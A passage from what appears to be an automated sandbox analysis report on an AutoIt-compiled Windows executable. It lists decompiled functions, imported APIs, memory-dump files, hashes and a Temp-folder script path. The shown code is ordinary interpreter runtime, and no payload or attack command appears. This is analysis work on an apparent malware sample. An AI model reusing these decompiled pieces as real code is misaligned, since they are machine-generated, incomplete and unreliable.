														_t121 =  &_v8;
														_push(_t121);
														_push(_t202);
														__imp__#23();
														__eflags = _t121;
														if(_t121 < 0) {
															L58:
															return 1;
														} else {
															_t205 = 0;
															__eflags = _t146;
															if(__eflags > 0) {
																do {
																	_push(0x10);
																	_t123 = E00AA14F7(_t205, _t212, __eflags);
																	_t220 = _t220 + 4;
																	__eflags = _t123;
																	if(_t123 == 0) {
																		_t123 = 0;
																		__eflags = 0;
																	} else {
																		 *_t123 = 0;
																		 *((intOrPtr*)(_t123 + 8)) = 1;
																		 *((intOrPtr*)(_t123 + 0xc)) = 0;
																	}
																	 *( *((intOrPtr*)( *_t212)) + _t205 * 4) = _t123;
																	_t124 = _a8;
																	_t163 = _t124 & 0x0000ffff;
																	__eflags = _t163 & 0x00004000;
																	if((_t163 & 0x00004000) == 0) {
																		_t187 = 0x00004000 | _t124;
																		__eflags = _t187;
																		_v44 = _t187;
																		_v36 = _v8;
																	} else {
																		_v44 = _t124;
																		E00AA0D80( &_v36, _v8, _a4);
																		_t220 = _t220 + 0xc;
																	}
																	E00AF71BD( *( *((intOrPtr*)( *_t212)) + _t205 * 4),  &_v44);
																	_v8 = _v8 + _a4;
																	_t205 = _t205 + 1;
																	__eflags = _t205 - _t146;
																} while (__eflags < 0);
															}
															_push(_v12);
															__imp__#24();
															return 1;
														}
														goto L59;
													case 4:
														_t130 =  &_v8;
														_push(_t130);
														_push(_t202);
														__imp__#23();
														__eflags = _t130;
														if(__eflags < 0) {
															goto L12;
														} else {
															E00AA0D80(E00AE30A7(_v8, __eflags, _t212, _t146), _v8, _t146);
															_push(_t202);
															__imp__#24();
															return 1;
														}
														goto L59;
													case 5:
														goto L42;
												}
											}
										}
									} else {
										L12:
										E00A99190(_t202, _t212);
										goto L13;
									}
								}
							}
						}
					}
				}
				L59:
			}




































                            0x00af6dde
                            0x00af6de1
                            0x00af6de4
                            0x00af6de9
                            0x00af6df2
                            0x00af6ea0
                            0x00af6ea8
                            0x00af6df8
                            0x00af6dfd
                            0x00af6e09
                            0x00af6e0c
                            0x00af6e0f
                            0x00af6dff
                            0x00af6e02
                            0x00af6e04
                            0x00af6e04
                            0x00af6e13
                            0x00000000
                            0x00af6e19
                            0x00af6e1b
                            0x00af6e25
                            0x00af6e2b
                            0x00af6e2d
                            0x00af6e35
                            0x00af6e37
                            0x00af6e3a
                            0x00af6e3f
                            0x00af6e42
                            0x00af6e47
                            0x00af6e4b
                            0x00af6e4e
                            0x00af6e50
                            0x00af6e51
                            0x00af6e54
                            0x00af6e42
                            0x00af6e60
                            0x00af6e67
                            0x00af6e6a
                            0x00af6e70
                            0x00af6e75
                            0x00af6e78
                            0x00af6e7d
                            0x00af6fa6
                            0x00af6fab
                            0x00af7109
                            0x00af710e
                            0x00af7114
                            0x00af7116
                            0x00af7118
                            0x00af711a
                            0x00af711c
                            0x00af711e
                            0x00af7121
                            0x00af7121
                            0x00af7123
                            0x00af7128
                            0x00af712b
                            0x00af712d
                            0x00af7145
                            0x00af7145
                            0x00af712f
                            0x00af712f
                            0x00af7135
                            0x00af713c
                            0x00af713c
                            0x00af714b
                            0x00af715b
                            0x00af715f
                            0x00af716b
                            0x00af7170
                            0x00af7174
                            0x00af7175
                            0x00af7175
                            0x00af7121
                            0x00000000
                            0x00af711c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00af6e83
                            0x00af6e83
                            0x00af6f29
                            0x00af6f2f
                            0x00af6f31
                            0x00000000
                            0x00af6f37
                            0x00af6f37
                            0x00af6f39
                            0x00af6f3b
                            0x00af6f3d
                            0x00af6f3d
                            0x00af6f3f
                            0x00af6f44
                            0x00af6f47
                            0x00af6f49
                            0x00af6f61
                            0x00af6f61
                            0x00af6f4b
                            0x00af6f4b
                            0x00af6f51
                            0x00af6f58
                            0x00af6f58
                            0x00af6f67
                            0x00af6f77
                            0x00af6f7b
                            0x00af6f87
                            0x00af6f8c
                            0x00af6f8d
                            0x00af6f8d
                            0x00af6f3d
                            0x00af6f95
                            0x00af6fa3
                            0x00af6fa3
                            0x00af6e89
                            0x00af6e8e
                            0x00af6eb0
                            0x00af6eb6
                            0x00af6eb8
                            0x00af6ebe
                            0x00af6ec0
                            0x00af6ec2
                            0x00af6ecb
                            0x00af6ecb
                            0x00af6ecd
                            0x00af6ed2
                            0x00af6ed5
                            0x00af6ed7
                            0x00af6eef
                            0x00af6eef
                            0x00af6ed9
                            0x00af6ed9
                            0x00af6edf
                            0x00af6ee6
                            0x00af6ee6
                            0x00af6ef5
                            0x00af6f00
                            0x00af6f09
                            0x00af6f15
                            0x00af6f1a
                            0x00af6f1b
                            0x00af6f1b
                            0x00af6f1f
                            0x00af7179
                            0x00af717d
                            0x00af717d
                            0x00000000
                            0x00af6e90
                            0x00af6e95
                            0x00af6fb1
                            0x00af6fb1
                            0x00af6fb3
                            0x00000000
                            0x00af6fb9
                            0x00af6fbe
                            0x00af6fc4
                            0x00af6fcb
                            0x00af6fce
                            0x00af6fd1
                            0x00af7079
                            0x00af7079
                            0x00af707c
                            0x00af7082
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00af6fd7
                            0x00af6fd7
                            0x00af6fde
                            0x00000000
                            0x00af7067
                            0x00000000
                            0x00000000
                            0x00af7088
                            0x00af7088
                            0x00000000
                            0x00000000
                            0x00af7070
                            0x00000000
                            0x00000000
                            0x00af701f
                            0x00af7026
                            0x00af7026
                            0x00af7029
                            0x00af702a
                            0x00af702b
                            0x00af7031
                            0x00af7033
                            0x00af7183
                            0x00af718b
                            0x00af7039
                            0x00af7039
                            0x00af703b
                            0x00af703d
                            0x00af7043
                            0x00af7043
                            0x00af7045
                            0x00af704a
                            0x00af704d
                            0x00af704f
                            0x00af7091
                            0x00af7091
                            0x00af7051
                            0x00af7051
                            0x00af7057
                            0x00af705e
                            0x00af705e
                            0x00af7097
                            0x00af709a
                            0x00af709e
                            0x00af70a1
                            0x00af70a7
                            0x00af70c8
                            0x00af70c8
                            0x00af70ce
                            0x00af70d2
                            0x00af70a9
                            0x00af70ac
                            0x00af70b9
                            0x00af70be
                            0x00af70be
                            0x00af70e0
                            0x00af70e8
                            0x00af70eb
                            0x00af70ec
                            0x00af70ec
                            0x00af7043
                            0x00af70f7
                            0x00af70f8
                            0x00af7106
                            0x00af7106
                            0x00000000
                            0x00000000
                            0x00af6fe5
                            0x00af6fe8
                            0x00af6fe9
                            0x00af6fea
                            0x00af6ff0
                            0x00af6ff2
                            0x00000000
                            0x00af6ff8
                            0x00af7005
                            0x00af700d
                            0x00af700e
                            0x00af701c
                            0x00af701c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00af6fde
                            0x00af6fd1
                            0x00af6e9b
                            0x00af6e9b
                            0x00af6e9b
                            0x00000000
                            0x00af6e9b
                            0x00af6e95
                            0x00af6e8e
                            0x00af6e83
                            0x00af6e7d
                            0x00af6e13
                            0x00000000

                            APIs
                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00AF6EB0
                            • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00AF6F29
                            • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00AF6FBE
                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00AF6FEA
                            • _memmove.LIBCMT ref: 00AF7005
                            • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00AF700E
                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00AF702B
                            • _memmove.LIBCMT ref: 00AF70B9
                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00AF710E
                            • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00AF70F8
                              • Part of subcall function 00AA14F7: std::exception::exception.LIBCMT ref: 00AA1546
                              • Part of subcall function 00AA14F7: std::exception::exception.LIBCMT ref: 00AA1560
                              • Part of subcall function 00AA14F7: __CxxThrowException@8.LIBCMT ref: 00AA1571
                            • SafeArrayUnaccessData.OLEAUT32(00B09A0A), ref: 00AF6F95
                              • Part of subcall function 00AA14F7: _malloc.LIBCMT ref: 00AA1511
                            • SafeArrayUnaccessData.OLEAUT32(00B09A0A), ref: 00AF717D
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                            • String ID:
                            • API String ID: 2170234536-0
                            • Opcode ID: 9fb527e40ebc41d03c4a391d43cce72d317ca17b4a56be9e134cb46cee21299f
                            • Instruction ID: 705aed87f0b2810e95f7b1d818e5d27cd4103c6b029511eb2d12e0dd92c517f4
                            • Opcode Fuzzy Hash: 9fb527e40ebc41d03c4a391d43cce72d317ca17b4a56be9e134cb46cee21299f
                            • Instruction Fuzzy Hash: F1B1D1756002099FDB14CF98D884BBEB7B5FF89300F248169FA458B361DB36E945CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA04E0, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 56windowregistryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 82%
                            			E00AA04E0(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v12;
				struct _WNDCLASSEXW _v60;
				struct HINSTANCE__* _t19;
				void* _t25;
				void* _t26;
				int _t27;
				struct HINSTANCE__* _t29;
				void* _t31;

				_t19 =  *0xb27520;
				 *0xb38684 = _t19;
				_v60.cbSize = 0x30;
				_v60.style = 0x2b;
				_v60.cbClsExtra = 0;
				_v60.cbWndExtra = 0x1e;
				_v60.hInstance = _t19;
				_v60.hCursor = 0;
				_v60.hbrBackground = GetSysColorBrush(0xf);
				_v60.lpszMenuName = 0;
				_v60.hIconSm = _a8;
				_v60.hIcon = _a4;
				_v60.lpszClassName = L"AutoIt v3 GUI";
				_v60.lpfnWndProc = 0xb0f04b;
				 *0xb274e0 = RegisterClassExW( &_v60);
				 *0xb38688 = RegisterWindowMessageW(L"TaskbarCreated");
				_v12 = 8;
				_v8 = 0x13b;
				__imp__InitCommonControlsEx( &_v12);
				_t25 = ImageList_Create(0x10, 0x10, 0x21, 1, 1);
				_t29 =  *0xb38684; // 0xa90000
				 *0xb386dc = _t25;
				_t26 = LoadIconW(_t29, 0xa9);
				_t31 =  *0xb386dc; // 0xcecc18
				_t27 = ImageList_ReplaceIcon(_t31, 0xffffffff, _t26);
				 *0xb386e0 = 0;
				return _t27;
			}












                            0x00aa04e6
                            0x00aa04f0
                            0x00aa04f5
                            0x00aa04fc
                            0x00aa0503
                            0x00aa0506
                            0x00aa050d
                            0x00aa0510
                            0x00aa051c
                            0x00aa0526
                            0x00aa0529
                            0x00aa052c
                            0x00aa052f
                            0x00aa0536
                            0x00aa0548
                            0x00aa0554
                            0x00aa055d
                            0x00aa0564
                            0x00aa056b
                            0x00aa057b
                            0x00aa0581
                            0x00aa058d
                            0x00aa0592
                            0x00aa0598
                            0x00aa05a2
                            0x00aa05a8
                            0x00aa05b2

                            APIs
                            • GetSysColorBrush.USER32(0000000F), ref: 00AA0513
                            • RegisterClassExW.USER32 ref: 00AA053D
                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA054E
                            • InitCommonControlsEx.COMCTL32(00B390E8), ref: 00AA056B
                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AA057B
                            • LoadIconW.USER32(00A90000,000000A9), ref: 00AA0592
                            • ImageList_ReplaceIcon.COMCTL32(00CECC18,000000FF,00000000), ref: 00AA05A2
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                            • String ID: +$0$TaskbarCreated
                            • API String ID: 2914291525-888179712
                            • Opcode ID: b64d1f3300db45b48960268b30f2ab2a74fd3577694da5d00f697cf0e69d1b4a
                            • Instruction ID: 0ba0fb312a90e65a2d977815a0950f4bd7ad16252571809b90cef369022bc4b6
                            • Opcode Fuzzy Hash: b64d1f3300db45b48960268b30f2ab2a74fd3577694da5d00f697cf0e69d1b4a
                            • Instruction Fuzzy Hash: 1621F4B5900318AFDB10DFA4E889ADEBFB5FB08710F50821AF914A73A0DBB05644DF95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B0931C, Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 28%
                            			E00B0931C(void* __eflags, void* __fp0, char _a4) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t58;
				intOrPtr _t61;
				char* _t62;
				signed int _t94;
				void* _t102;
				void* _t103;
				intOrPtr _t104;
				signed int _t108;
				signed int _t111;
				void* _t112;
				void* _t123;

				_t123 = __fp0;
				_t58 = E00AC23B2( &_a4, 0);
				_t102 = _t58;
				__imp__#41(0xc, _t102,  &_v8);
				if(_t58 < 0) {
					L13:
					E00A99190(_t102,  &_a4);
					return 0;
				} else {
					_t94 = 0;
					if(_t102 > 0) {
						do {
							_t4 = _t94 + 1; // 0x1
							_t111 = _t4;
							 *((intOrPtr*)(_v8 + 0x14 + _t94 * 8)) = 0;
							 *((intOrPtr*)(_v8 + 0x10 + _t94 * 8)) = E00AC23B2( &_a4, _t111);
							_t94 = _t111;
						} while (_t94 < _t102);
					}
					_t61 = _v8;
					 *((short*)(_t61 + 2)) = 0x880;
					 *((intOrPtr*)(_v8 + 4)) = 0x10;
					__imp__#37(_v8);
					if(_t61 < 0) {
						__imp__#38(_v8);
						goto L13;
					} else {
						_t62 =  &_v36;
						__imp__#8(_t62);
						_v28 = 0;
						_v24 = 0;
						_v52 = 0;
						_v44 = 1;
						_v40 = 0;
						__imp__#23(_v8,  &_v16);
						if(_t62 < 0) {
							__imp__#39(_v8);
							__imp__#38(_v8);
							E00A99190(_t102,  &_v52);
							__imp__#9( &_v36);
							E00A99190(_t102,  &_a4);
							return 0;
						} else {
							_v12 = _v16;
							E00A990D0( &_v52,  &_a4,  &_a4);
							_t103 = E00B091EA( &_a4,  &_v52,  &_v20);
							_t108 = 0;
							if(_t103 > 0) {
								_t91 = _v12;
								do {
									_t75 = _v20;
									if( *((intOrPtr*)(_v20 + _t108 * 4)) != 0) {
										_t112 = _t112 - 0x10;
										E00A9BBB0( *((intOrPtr*)(_t75 + _t108 * 4)), _t112, _t91, _t103);
										E00B00E0F(_t91, _t103, _t123);
										_t91 = _v12;
										__imp__#10(_v12,  &_v36,  &_v36);
									}
									_v12 = _v12 + 0x10;
									_t108 = _t108 + 1;
								} while (_t108 < _t103);
							}
							__imp__#24(_v8);
							_t104 = _v8;
							E00A99190(_t104,  &_v52);
							__imp__#9( &_v36);
							_v28 = 0;
							_v24 = 0;
							E00A99190(_t104,  &_a4);
							return _t104;
						}
					}
				}
			}



























                            0x00b0931c
                            0x00b0932c
                            0x00b09335
                            0x00b0933a
                            0x00b09342
                            0x00b094a7
                            0x00b094aa
                            0x00b094b7
                            0x00b09348
                            0x00b09348
                            0x00b0934c
                            0x00b0934e
                            0x00b09351
                            0x00b09351
                            0x00b09359
                            0x00b09365
                            0x00b09369
                            0x00b0936b
                            0x00b0934e
                            0x00b0936f
                            0x00b09377
                            0x00b0937e
                            0x00b09389
                            0x00b09391
                            0x00b094a1
                            0x00000000
                            0x00b09397
                            0x00b09397
                            0x00b0939b
                            0x00b093a9
                            0x00b093ac
                            0x00b093af
                            0x00b093b2
                            0x00b093b9
                            0x00b093bc
                            0x00b093c4
                            0x00b09468
                            0x00b09472
                            0x00b0947b
                            0x00b09484
                            0x00b0948d
                            0x00b0949a
                            0x00b093ca
                            0x00b093d4
                            0x00b093d7
                            0x00b093e6
                            0x00b093e8
                            0x00b093ec
                            0x00b093ee
                            0x00b093f4
                            0x00b093f4
                            0x00b093fb
                            0x00b09400
                            0x00b09405
                            0x00b0940e
                            0x00b09413
                            0x00b0941b
                            0x00b0941b
                            0x00b09421
                            0x00b09425
                            0x00b09426
                            0x00b093f4
                            0x00b0942e
                            0x00b09434
                            0x00b0943a
                            0x00b09443
                            0x00b0944e
                            0x00b09451
                            0x00b09454
                            0x00b09461
                            0x00b09461
                            0x00b093c4
                            0x00b09391

                            APIs
                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,00B095B7), ref: 00B0933A
                            • SafeArrayAllocData.OLEAUT32(00B095B7), ref: 00B09389
                            • VariantInit.OLEAUT32(?), ref: 00B0939B
                            • SafeArrayAccessData.OLEAUT32(00B095B7,?), ref: 00B093BC
                            • VariantCopy.OLEAUT32(?,?), ref: 00B0941B
                            • SafeArrayUnaccessData.OLEAUT32(00B095B7), ref: 00B0942E
                            • VariantClear.OLEAUT32(?), ref: 00B09443
                            • SafeArrayDestroyData.OLEAUT32(00B095B7), ref: 00B09468
                            • SafeArrayDestroyDescriptor.OLEAUT32(00B095B7), ref: 00B09472
                            • VariantClear.OLEAUT32(?), ref: 00B09484
                            • SafeArrayDestroyDescriptor.OLEAUT32(00B095B7), ref: 00B094A1
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                            • String ID:
                            • API String ID: 2706829360-0
                            • Opcode ID: 76910d0cca6eb0d0fa8f2a5db1e8fbceffe89a979ce137406d7912f220891b2c
                            • Instruction ID: 23fbf2b3b36e65b77bccc40f61ee13b26855db530c018b95e3d2616b0ebfa344
                            • Opcode Fuzzy Hash: 76910d0cca6eb0d0fa8f2a5db1e8fbceffe89a979ce137406d7912f220891b2c
                            • Instruction Fuzzy Hash: 58514F76A00219AFCF04DFE4DD849DEBBB9FF48304F508559EA05A7251DB30AA46CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AE4262, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 271libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AddressProc_free_malloc$_strlen
                            • String ID: AU3_FreeVar
                            • API String ID: 3358881862-771828931
                            • Opcode ID: 94d705aac00d00f1903c62fb634fcfccf1af69df2e50829b260355a41d7f305d
                            • Instruction ID: b2a604762b2617a373034a98185fcf780277bd887c13dcf45336c4e693e58e1d
                            • Opcode Fuzzy Hash: 94d705aac00d00f1903c62fb634fcfccf1af69df2e50829b260355a41d7f305d
                            • Instruction Fuzzy Hash: D7B1CFB4A00246DFCB00DF59C985A6AB7F9FF88314F2485A9E9158F362D731ED51CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AEFB23, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 147windowCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00AEFB72
                            • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 00AEFBBF
                            • IsMenu.USER32 ref: 00AEFBD6
                            • CreatePopupMenu.USER32(00000000,?,770C33D0), ref: 00AEFC0E
                            • GetMenuItemCount.USER32 ref: 00AEFC74
                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AEFC9D
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                            • String ID: 0$2
                            • API String ID: 3311875123-3793063076
                            • Opcode ID: 02362e76189cab4d9fcffb47308e7c9b80b958dbdb41f1c61733e614a9b04b81
                            • Instruction ID: 62255df233b9b9fef26d7d5d910929c450117cc820ada7de67a799e59cf0aa9f
                            • Opcode Fuzzy Hash: 02362e76189cab4d9fcffb47308e7c9b80b958dbdb41f1c61733e614a9b04b81
                            • Instruction Fuzzy Hash: 3C51B371A002499FDB10DF6AD984BAEBBB4EF94314F348529EC25D72C1D7709845CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A91E00, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 118windowCOMMON
                            Download Yara Rule
                            APIs
                            • LoadStringW.USER32(?,00000065,?,0000007F), ref: 00AB7AB3
                              • Part of subcall function 00A92390: _wcslen.LIBCMT ref: 00A9239D
                              • Part of subcall function 00A92390: _memmove.LIBCMT ref: 00A923C3
                            • _memset.LIBCMT ref: 00A91E90
                            • _wcsncpy.LIBCMT ref: 00A91ED2
                            • _wcscpy.LIBCMT ref: 00A91EF1
                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A91F03
                            • __swprintf.LIBCMT ref: 00AB7B2D
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy_wcslen_wcsncpy
                            • String ID: Line %d: $AutoIt -
                            • API String ID: 1629950421-4094128768
                            • Opcode ID: 64a27cdf9cabab1fc9f344ca96df7e26b3380cd0bb339639fba3c79f5337873d
                            • Instruction ID: eba25fd98fc34b0806cc564ec144533800c68c0c07ea3ac2b94e70a63533e997
                            • Opcode Fuzzy Hash: 64a27cdf9cabab1fc9f344ca96df7e26b3380cd0bb339639fba3c79f5337873d
                            • Instruction Fuzzy Hash: D941C471618345ABDB20EB20DD41FEF73E8BF84304F44092DF59893191EB70AA09CB96
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AC401B, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,00B390E8,?,00000100,?,C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg), ref: 00AC403E
                            • LoadStringW.USER32(00000000), ref: 00AC4047
                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00AC405C
                            • LoadStringW.USER32(00000000), ref: 00AC405F
                            • _wprintf.LIBCMT ref: 00AC4088
                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AC40A0
                            Strings
                            • C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg, xrefs: 00AC4027
                            • %s (%d) : ==> %s: %s %s, xrefs: 00AC4083
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: HandleLoadModuleString$Message_wprintf
                            • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg
                            • API String ID: 3648134473-1500864824
                            • Opcode ID: 723c923b22d418469a9568640db5e8d0bca4fb26b6723a6f60f23eb71d9af026
                            • Instruction ID: a52bb0abf47d5e449ba461df276f1152b9e6ef6511442ef5154bb0cab7206f24
                            • Opcode Fuzzy Hash: 723c923b22d418469a9568640db5e8d0bca4fb26b6723a6f60f23eb71d9af026
                            • Instruction Fuzzy Hash: 4A0144B2A503187AEB20E794DD06FF6376CD784B01F408199BB48AB0C0DEF06D948BB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AEE9FC, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                            Download Yara Rule
                            APIs
                            • VariantInit.OLEAUT32(00000000), ref: 00AEEA43
                            • VariantCopy.OLEAUT32(00000000), ref: 00AEEA4D
                            • VariantClear.OLEAUT32 ref: 00AEEA5A
                            • VariantTimeToSystemTime.OLEAUT32 ref: 00AEEBF3
                            • __swprintf.LIBCMT ref: 00AEEC20
                            • VariantInit.OLEAUT32(00000000), ref: 00AEECDB
                            Strings
                            • %4d%02d%02d%02d%02d%02d, xrefs: 00AEEC1A
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Variant$InitTime$ClearCopySystem__swprintf
                            • String ID: %4d%02d%02d%02d%02d%02d
                            • API String ID: 2441338619-1568723262
                            • Opcode ID: 8b0cdb140abfe899d6ee695dcfa0b76ba383b340a46ea17ffac988bab0f68db4
                            • Instruction ID: 8a3e83ac120fde8e5c18c66358ad5860540bf838610db08a025f20fca577666e
                            • Opcode Fuzzy Hash: 8b0cdb140abfe899d6ee695dcfa0b76ba383b340a46ea17ffac988bab0f68db4
